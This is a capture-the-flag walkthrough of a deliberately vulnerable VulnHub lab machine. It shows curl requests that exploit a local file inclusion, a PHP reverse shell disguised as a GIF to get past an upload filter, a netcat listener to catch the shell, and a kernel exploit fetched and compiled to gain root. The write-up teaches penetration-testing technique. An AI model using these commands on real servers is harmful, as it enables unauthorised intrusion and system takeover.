Hello readers and welcome to another CTF challenge. This
VM is made by Frank Tope as you’ll see in the very homepage on the server’s
website (his resume). Nice touch, if I might add. Anyhow, you can download this
VM from vulnhub here. The
aim of this lab is to get root and read the congratulatory message written in
the flag.
I would rate the difficulty level of this lab to be intermediate. Although, there were no
buffer overflows or unnecessary exploit development, yet it did make us think a
little.
Steps
Involved:
1.
Port Scanning and IP clutching.
2.
Directory busting port 80.
3.
Directory busting port 8011.
4.
Discovering LFI vulnerability.
5.
Discovering an HTML backup file.
6.
Cracking password hash
7.
Logging in /development
8.
Uploading a PHP shell disguised as GIF file.
9.
Bypassing the check and triggering the file to
get a netcat shell.
10.
Privilege escalation to get flag.
Alright then, let’s head into the VM all the way in.
First step is as always, running netdiscover on the VM to grab the IP address. In my case the IP was
192.168.1.103.
Once the IP was found, we ran nmap aggressive scan to enumerate all the open ports.
What was there to wait for after we saw port 80 open! We
headed straight into the browser and a webpage got displayed which looked like
a single page resume.
After not finding much, we chose to ran directory buster dirb.
Robots.txt seemed interesting at first but it had nothing
at all. Another directory was /development.
It looked like a testing site since it asked for the authentication.
We then chose to look into port 8011, after finding not
much of the info. It looked like a backend to development directory.
We ran one more dirb
scan on this port.
We found an interesting directory called /api
We opened it in the browser immediately.
We modified the URL parameter to /api/
but only one api seemed to be working and that was files_api.php
A message said “no parameter called file passed to me.” It
gave us a hint that we had to pass a parameter called file.
192.168.1.103:8011/api/files_api.php?file=/etc/passwd
HAHA. They got us. But still there was another thing left
to try—by passing parameter through curl.
Curl – X POST –d
“file=/etc/passwd” http://192.168.1.103:8011/api/files_api.php
As you can see, LFI is present here!
Now, we tried some methods,
put our hands here and there but nothing worked with this LFI.
Meanwhile, another thing that
got our attention was the development server. You had a development site, you
have a development server, and hence there would be more than one html files or copies of html files (backups).
One such common file is index.html.bak
It was an arrow in the dark
but it hit the bullseye!
We saved it and read it using cat utility.
It had a password hash!
It took us no time to copy this in a text files called hash.txt and run John the Ripper on it.
It surely were the credentials to /development authentication.
frank:frank!!!!
And it opened up like a beautiful treasure!
The message on this page said that the uploader tool was
only half completed. So, we went to /uploader directory
The uploader had a security check for images only (jpg,
png, gif) and a size limitation too.
So, here is what we did.
Traverse to the directory:
/usr/share/webshells/php/php-reverse-shell.php
Open it with text editor
and add GIF98 in the first line and save this file as shell.gif
Now, what this will do is that it will trick the uploader
in believing the file is GIF when in reality, it is a PHP reverse shell.
So, we upload shell.gif using the uploader and the
following message was received.
Now, the author said file was uploaded to his uploads
path. Let’s get a little perspective here.
Website’s name: Frank’s website
Uploader’s name: Frank uploader.
First message on website: I love patterns
It took a while for us but we guessed it in the end, the
upload’s directory would be named frank uploads.
We tried many permutations for this directory like:
Frankupload, frankUploads, franksuploads etc. but the one that seemed to hit
was FRANKuploads.
This step was tedious and time consuming as there was no
straight connection from anywhere to this directory.
Now, all was left to trigger this file.
We know for a fact that double clicking won’t do us any
good so we used curl once again to
get shell.
We activated netcat on a terminal side by side and typed
this following curl command:
Curl –X POST –d
“file=/var/www/development/uploader/FRANKuploads/shell.gif” http://192.168.1.103:8011/api/files_api.php
On other terminal, we had activated netcat:
Nc –lvp 1234
As soon as curl triggered the LFI vulnerability and
requested for shell.gif, we got a netcat session!
Id
Python –c ‘import
pty;pty.spawn(“/bin/bash”);’
Uname –a
After a bit of surfing, we found a Linux Kernel exploit
for version 2.6
Searchsploit 15285
Cd Desktop
Cp
/usr/share/exploitdb/exploits/linux/local/15285.c .
Python –m
SimpleHTTPServer 80
On our vm shell, we downloaded this exploit, compiled it
and ran it to get root!
Cd tmp
Gcc 15285.c –o
15285
Chmod 777 15285
./15285
Voila! We got
root!
Cd root
Ls
Cat root.txt
0 comments:
Post a Comment